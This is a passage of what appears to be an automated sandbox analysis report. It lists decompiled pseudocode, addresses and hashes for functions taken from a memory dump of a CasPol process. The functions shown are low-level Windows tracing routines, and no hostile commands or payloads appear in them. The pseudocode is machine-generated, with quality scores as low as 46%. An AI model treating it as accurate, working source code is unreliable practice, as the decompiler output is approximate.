                                                                • Opcode Fuzzy Hash: 082867df6634c1be7ae5aaaca515b859ad08aabf57aec41d171faf2bdb722c2f
                                                                • Instruction Fuzzy Hash: D5015E71A01359AFDB14DFA9DC45EAEBBB8EF55710F00406AB904EB380DA749E01CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E14FB Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 61%
                                                                			E016E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x171d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0166FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01647D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                0x016e14fb
                                                                0x016e14fb
                                                                0x016e150a
                                                                0x016e1514
                                                                0x016e1519
                                                                0x016e151b
                                                                0x016e1526
                                                                0x016e152c
                                                                0x016e1534
                                                                0x016e1537
                                                                0x016e153a
                                                                0x016e1545
                                                                0x016e1557
                                                                0x016e1547
                                                                0x016e1550
                                                                0x016e1550
                                                                0x016e1562
                                                                0x016e1563
                                                                0x016e1565
                                                                0x016e156a
                                                                0x016e157f

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2464612e831e4d62129f327c157363836aa8a58e413ce8cab99f089f0ac67fb9
                                                                • Instruction ID: ea68f37c1b071b9a0c9c233b1b843111c18c0c59fb3c2cfbee791529b12a3159
                                                                • Opcode Fuzzy Hash: 2464612e831e4d62129f327c157363836aa8a58e413ce8cab99f089f0ac67fb9
                                                                • Instruction Fuzzy Hash: 4C019E71A01258EFCB10DFA9DC45EAEBBB8EF45710F40406AF904EB380DA70DA00CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016258EC Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 91%
                                                                			E016258EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x171d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1605c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01625943() != 0 &&  *0x1715320 > 5) {
					E016A7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E016A7B5E( &_v28, _t28);
					_t11 = E016A7B9C(0x1715320, 0x160bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0166B640(_t11, _t17, _v8 ^ _t29, 0x160bf15, _t27, _t28);
			}















                                                                0x016258fb
                                                                0x016258fe
                                                                0x01625906
                                                                0x0162590a
                                                                0x0162593c
                                                                0x0162593c
                                                                0x0162590c
                                                                0x0162590c
                                                                0x01625911
                                                                0x00000000
                                                                0x01625913
                                                                0x01625913
                                                                0x01625913
                                                                0x01625911
                                                                0x0162591d
                                                                0x01681035
                                                                0x0168103c
                                                                0x0168103f
                                                                0x01681056
                                                                0x01681056
                                                                0x0162593b

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 762ff2127c565c3d4394ebf183ca0e254e7fc8f9accaeec08a4aa95839c855af
                                                                • Instruction ID: c865538e835c7ad7043a36cb21f8b9f09b69cf201d75e638123891dce3335e51
                                                                • Opcode Fuzzy Hash: 762ff2127c565c3d4394ebf183ca0e254e7fc8f9accaeec08a4aa95839c855af
                                                                • Instruction Fuzzy Hash: 2401DF71B00925ABC728EE6CDC009EFB7AAEB92130F94406DDA06D7284DF21DD02CA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F1074 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E016F165E(__ebx, 0x1718ae4, (__edx -  *0x1718b04 >> 0x14) + (__edx -  *0x1718b04 >> 0x14), __edi, __ecx, (__edx -  *0x1718b04 >> 0x14) + (__edx -  *0x1718b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E016EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01647D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E016DFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                0x016f1074
                                                                0x016f1080
                                                                0x016f1082
                                                                0x016f108a
                                                                0x016f108f
                                                                0x016f1093
                                                                0x016f10ab
                                                                0x016f10ab
                                                                0x016f10c3
                                                                0x016f10cf
                                                                0x016f10e1
                                                                0x016f10d1
                                                                0x016f10da
                                                                0x016f10da
                                                                0x016f10e9
                                                                0x016f10f5
                                                                0x016f10f5
                                                                0x016f10fe

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1be93617f7be283d7a79fc91bf87842aa3b0a2a7462a7dab7739ed72c1158ce
                                                                • Instruction ID: be50a4c17ae1838409bd2d00d0d6708332836dabbfcedaf30b9784973a5aa72b
                                                                • Opcode Fuzzy Hash: c1be93617f7be283d7a79fc91bf87842aa3b0a2a7462a7dab7739ed72c1158ce
                                                                • Instruction Fuzzy Hash: F8012872604742DBC710DF6CCD44B1ABBE6AB84250F04862DFA8583390DF30D541CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163B02A Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0163B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01647D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E016A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                0x0163b037
                                                                0x0163b039
                                                                0x0163b03b
                                                                0x0163b040
                                                                0x0168a60e
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a61d
                                                                0x0163b04b
                                                                0x0163b04e
                                                                0x0168a627
                                                                0x0168a634
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a641
                                                                0x0168a653
                                                                0x0168a643
                                                                0x0168a64c
                                                                0x0168a64c
                                                                0x0168a65b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a66c
                                                                0x0163b057
                                                                0x0163b057
                                                                0x0163b057
                                                                0x0163b046
                                                                0x0163b046
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                • Instruction ID: ef942c9196e98bd2c8b444199b1c0f69738b5912dc677fcfbb56db1864b220ac
                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                • Instruction Fuzzy Hash: 31018F722049809FE3229B5DCD88F66BBD8EBD5754F0900A2FA19CBB52D728DC81C624
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016DFE3F Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 59%
                                                                			E016DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x171d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0166FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01647D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0166B640(E01669AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                0x016dfe3f
                                                                0x016dfe3f
                                                                0x016dfe4e
                                                                0x016dfe58
                                                                0x016dfe5d
                                                                0x016dfe5f
                                                                0x016dfe6a
                                                                0x016dfe72
                                                                0x016dfe75
                                                                0x016dfe78
                                                                0x016dfe83
                                                                0x016dfe95
                                                                0x016dfe85
                                                                0x016dfe8e
                                                                0x016dfe8e
                                                                0x016dfea0
                                                                0x016dfea1
                                                                0x016dfea3
                                                                0x016dfea8
                                                                0x016dfebd

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49f9cc02e27b231d61eff29669ed5a2c1192d66d0843d347272d682b252d11d8
                                                                • Instruction ID: e779ad73f23fc457af7bca19939df2113e292bdb07557f5a6c542a44833e338d
                                                                • Opcode Fuzzy Hash: 49f9cc02e27b231d61eff29669ed5a2c1192d66d0843d347272d682b252d11d8
                                                                • Instruction Fuzzy Hash: 7D018471E00259AFDB14DFA9DC45FAEBBB9EF54710F00406AB901EB381DA709A01C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016DFEC0 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 59%
                                                                			E016DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x171d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0166FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01647D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0166B640(E01669AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                0x016dfec0
                                                                0x016dfec0
                                                                0x016dfecf
                                                                0x016dfed9
                                                                0x016dfede
                                                                0x016dfee0
                                                                0x016dfeeb
                                                                0x016dfef3
                                                                0x016dfef6
                                                                0x016dfef9
                                                                0x016dff04
                                                                0x016dff16
                                                                0x016dff06
                                                                0x016dff0f
                                                                0x016dff0f
                                                                0x016dff21
                                                                0x016dff22
                                                                0x016dff24
                                                                0x016dff29
                                                                0x016dff3e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dee6a9e917b30b54fccab906be80656e15735f67195189e6737d86ad977c8da9
                                                                • Instruction ID: a2294658573c55224affcf5b692faf240aa30af4218519a5a77be4454e04df10
                                                                • Opcode Fuzzy Hash: dee6a9e917b30b54fccab906be80656e15735f67195189e6737d86ad977c8da9
                                                                • Instruction Fuzzy Hash: 2A018471E00219AFDB14DFA9DC45FAEBBB8EF54710F0040AAB901EB380DA709A01C798
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F8A62 Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 54%
                                                                			E016F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x171d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01647D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0166B640(E01669AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                0x016f8a62
                                                                0x016f8a71
                                                                0x016f8a79
                                                                0x016f8a82
                                                                0x016f8a85
                                                                0x016f8a89
                                                                0x016f8a8c
                                                                0x016f8a8f
                                                                0x016f8a92
                                                                0x016f8a95
                                                                0x016f8a9f
                                                                0x016f8ab1
                                                                0x016f8aa1
                                                                0x016f8aaa
                                                                0x016f8aaa
                                                                0x016f8abc
                                                                0x016f8abd
                                                                0x016f8abf
                                                                0x016f8ac4
                                                                0x016f8ada

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d64a11d9112ecadada9cded9e7d34b9842e7dcb6f2e09c17b6eaa3f3f3ae472
                                                                • Instruction ID: ecbb346f2d94982b612bf8d2e11bcd436291fb48f482cafe31da0a41c3a837de
                                                                • Opcode Fuzzy Hash: 8d64a11d9112ecadada9cded9e7d34b9842e7dcb6f2e09c17b6eaa3f3f3ae472
                                                                • Instruction Fuzzy Hash: 0C01EC71A0121DAFDB04DFA9D9459AEBBB8EF58710F10405AFA05E7351DB34AA01CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F8ED6 Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 54%
                                                                			E016F8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x171d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01647D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0166B640(E01669AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                0x016f8ed6
                                                                0x016f8ee5
                                                                0x016f8eed
                                                                0x016f8ef0
                                                                0x016f8efa
                                                                0x016f8f03
                                                                0x016f8f0c
                                                                0x016f8f15
                                                                0x016f8f24
                                                                0x016f8f27
                                                                0x016f8f31
                                                                0x016f8f43
                                                                0x016f8f33
                                                                0x016f8f3c
                                                                0x016f8f3c
                                                                0x016f8f4e
                                                                0x016f8f4f
                                                                0x016f8f51
                                                                0x016f8f56
                                                                0x016f8f69

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5a5e02e44c695b99a47f65eead4f3f7ca610f4260771faecbc4106c806cbe69e
                                                                • Instruction ID: b4c206baf454780b628caa88116786a0987aa0f76a533f66defef0b295f1ea86
                                                                • Opcode Fuzzy Hash: 5a5e02e44c695b99a47f65eead4f3f7ca610f4260771faecbc4106c806cbe69e
                                                                • Instruction Fuzzy Hash: 86111E71A01259DFDB04DFA8D941BAEFBF4FF08300F0442AAE918EB381E6349940CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162DB60 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0162DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0162DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0162E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0162E8B0(__ecx, _t14, 0xfff);
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                0x0162db64
                                                                0x0162db66
                                                                0x0162db6b
                                                                0x0162dbaa
                                                                0x0162db71
                                                                0x0162db76
                                                                0x0162db7a
                                                                0x0162dba3
                                                                0x0162db7c
                                                                0x0162db87
                                                                0x0162db8b
                                                                0x01684fa1
                                                                0x01684fb3
                                                                0x01684fb8
                                                                0x0162db91
                                                                0x0162db96
                                                                0x0162db98
                                                                0x0162db98
                                                                0x0162db8b
                                                                0x0162db7a
                                                                0x0162db9d
                                                                0x0162dba2

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                • Instruction ID: 6d988b2128fd279b2484779c83eb9744e6ad2606c79f9ae8a43ca60157f2c534
                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                • Instruction Fuzzy Hash: 5BF0FC73605D339BD3326AD94CA0F67BA969FE2A61F160039F2059B344CF608C028ED5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162B1E1 Relevance: .0, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0162B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01647D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01647D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E016A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                0x0162b1e8
                                                                0x0162b1ea
                                                                0x0162b1f3
                                                                0x01684a17
                                                                0x0162b1f9
                                                                0x0162b1f9
                                                                0x0162b1f9
                                                                0x0162b201
                                                                0x01684a21
                                                                0x01684a2e
                                                                0x00000000
                                                                0x00000000
                                                                0x01684a3b
                                                                0x01684a4d
                                                                0x01684a3d
                                                                0x01684a46
                                                                0x01684a46
                                                                0x01684a55
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0162b20a
                                                                0x0162b20a
                                                                0x0162b20a
                                                                0x0162b20a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                • Instruction ID: cc80c5463c5690174be015367accfd37e51d36f2fab67400222573683d54ecee
                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                • Instruction Fuzzy Hash: A501F433201A91DBD322A75DCC04F69BB99EF52754F0944A1FE148B7B2DB79C800C728
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016BFE87 Relevance: .0, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 46%
                                                                			E016BFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x171d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01647D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                0x016bfe96
                                                                0x016bfe9e
                                                                0x016bfea1
                                                                0x016bfead
                                                                0x016bfeb3
                                                                0x016bfeb9
                                                                0x016bfec3
                                                                0x016bfed5
                                                                0x016bfec5
                                                                0x016bfece
                                                                0x016bfece
                                                                0x016bfee0
                                                                0x016bfee1
                                                                0x016bfee3
                                                                0x016bfee8
                                                                0x016bfefb

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f95ea5d96e29aa19fe9dfc0a9a2631ced68d783656201a050ca9eff0e5a6114
                                                                • Instruction ID: 16150cc2d9b29967e26f0f8a50d11db14b2030695ce62f77ea8ba4aecfeef89e
                                                                • Opcode Fuzzy Hash: 3f95ea5d96e29aa19fe9dfc0a9a2631ced68d783656201a050ca9eff0e5a6114
                                                                • Instruction Fuzzy Hash: 9A018671A0020DEFCB14DFA8D945A6EB7F4FF14704F104199B904DB392DA35DA02CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E131B Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 48%
                                                                			E016E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x171d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01647D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0166B640(E01669AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                0x016e131b
                                                                0x016e132a
                                                                0x016e1330
                                                                0x016e1336
                                                                0x016e133e
                                                                0x016e1341
                                                                0x016e1344
                                                                0x016e134f
                                                                0x016e1361
                                                                0x016e1351
                                                                0x016e135a
                                                                0x016e135a
                                                                0x016e136c
                                                                0x016e136d
                                                                0x016e136f
                                                                0x016e1374
                                                                0x016e1387

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 21bbf94f85b79fd17a30365da03e0a945a638b384c5b8f1ab1b7a3f1c6e2f532
                                                                • Instruction ID: e3f054596c88adf1a0181552380124ae57eb909f9317b1e0e1c4344c00054e08
                                                                • Opcode Fuzzy Hash: 21bbf94f85b79fd17a30365da03e0a945a638b384c5b8f1ab1b7a3f1c6e2f532
                                                                • Instruction Fuzzy Hash: 30013C71A0125DAFCB04EFA9D949AAEB7F4FF18700F108059BD45EB381EA349A00DB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

